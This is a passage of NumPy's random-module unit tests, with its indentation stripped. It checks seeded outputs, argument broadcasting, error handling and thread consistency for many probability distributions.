def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10, 5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
np.random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
__index__ = __int__
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
np.random.seed(self.seed)
assert_equal(np.random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
